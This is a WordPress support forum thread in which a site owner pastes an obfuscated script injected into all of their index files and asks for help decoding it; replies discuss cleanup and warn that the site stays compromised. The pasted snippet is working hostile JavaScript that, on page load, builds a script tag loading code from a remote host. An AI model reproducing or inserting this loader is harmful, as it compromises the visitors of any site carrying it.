WordPress.org

Support

Support » Installation » [Resolved] obfuscated code – can anyone decode?

[Resolved] obfuscated code – can anyone decode?

  • This code is showing up on all my index.php files once I upload to the server. I’ve tried replacing all the index.php with clean files only to find this code on the files a few hours later again.

    <script>/*GNU GPL*/ try{window.onload = function(){var Dwqlxqw7kr7vkv = document.createElement('s@$$^c&r!i^p&t^)#&'.replace(/\^|\$|\!|\(|&|\)|#|@/ig, ''));var N790b8w6sa8nl = 'U70yiuxmlrwd';Dwqlxqw7kr7vkv.setAttribute('type', 't&@^e!$&x^&!t!#/@(j!(a@v@)a(s!!!@c^^!r)&&i&p)^#t))'.replace(/\$|@|\(|#|\)|\^|\!|&/ig, ''));Dwqlxqw7kr7vkv.setAttribute('src', 'h$t$&$(t^@p!@^:!^$!/(!/)!a&!d))#^d@@i)^(c$!$&!t#$i)#(n()$!g(g(!a#m$!#e^!$s)^-#c(&o@$(!m!.^#&f(!c&@!$2&.#c^o^&m!.!z(#i(#d#!)d$!$u!#!-#!(c!o&@m!$#.($t!@h)$e&$g)@i^@!f(t!#@s#a(l$)&)e!.&^@r((u$#@:^$8@@^0&^!^8^^&0!@/@))g$)^@o$o&#$g(&l!(&)e$$.)#c@@o#m&/!!g(#o@$!o&g(!l$^#e@!.&($c!#o#m^#/^(d&$@i(^o^#n$(&.)#!n!)&e(!.)j!@p!#^$/@))v$!e))!r)(#i)!z^$@(o^((n)(.$n(@)e#@t$!/))^#w!^)i^&#r$($e#!@@$d)!!.#)&c#(@o(m&/&^'.replace(/\$|@|#|\(|&|\!|\)|\^/ig, ''));Dwqlxqw7kr7vkv.setAttribute('defer', 'd#e&)f@e)$r#)'.replace(/&|\(|#|@|\)|\$|\!|\^/ig, ''));Dwqlxqw7kr7vkv.setAttribute('id', 'L^)#6^!)^q@@c#!@@e@&@e^#^f$$@n#^@#7&f@l@^^('.replace(/\!|&|\$|\)|\^|@|#|\(/ig, ''));document.body.appendChild(Dwqlxqw7kr7vkv);}} catch(O27phyeucb2au4) {}</script>

Viewing 8 replies - 1 through 8 (of 8 total)
  • esmi

    @esmi

    Forum Moderator

    Site url?

    the site is http://www.artcretedesigns.com

    i’ve disabled the index.php file and it is pointing to the old html file.

    it seems to be some kind of virus. it is showing up on all index files whether php html asp…

    esmi

    @esmi

    Forum Moderator

    Hello to everybody. Is all the morning that I’m trying to decode or delete in some way my “double” base64 coding….I tried every thing, nothing…. and, unvelible, (in my template is working ok) I just deleted the command “get header” and “get footer” from index, page, search, etc. an I replaced them with a command “include”. I designed my footer (you can easily change the original one too removing completely the base 64 code using Dreamweaver or similar) and every thing works great.
    I cannot believe it. I lost 5 hours and the solution was there!

    I forgot. You have to save your footer.php (or header or whatelse) with another name, eg. footer2.php and live in the ROOT the original one running (alone and forgotten)

    Sometimes this stuff can be encoded twenty times or more.

    Removing the get_header and get_footer may get the code off your site but it doesn’t make you not-hacked. Someone got in. The door is still there and maybe there are additional back doors now. Whoever did this can come back. There may be other code that you haven’t found yet as well. You aren’t done.

    Sorry, I post a reply to the wrong argument!!! My trick was just to delete advertise in WP Themes.

    I don’t understand your comment about deleting ‘advertise’ but my point still stands for anyone reading the thread: this is not a solution to a hacked site. It might be a quick band-aid but it is not the end of the story.

Viewing 8 replies - 1 through 8 (of 8 total)
  • The topic ‘[Resolved] obfuscated code – can anyone decode?’ is closed to new replies.
Skip to toolbar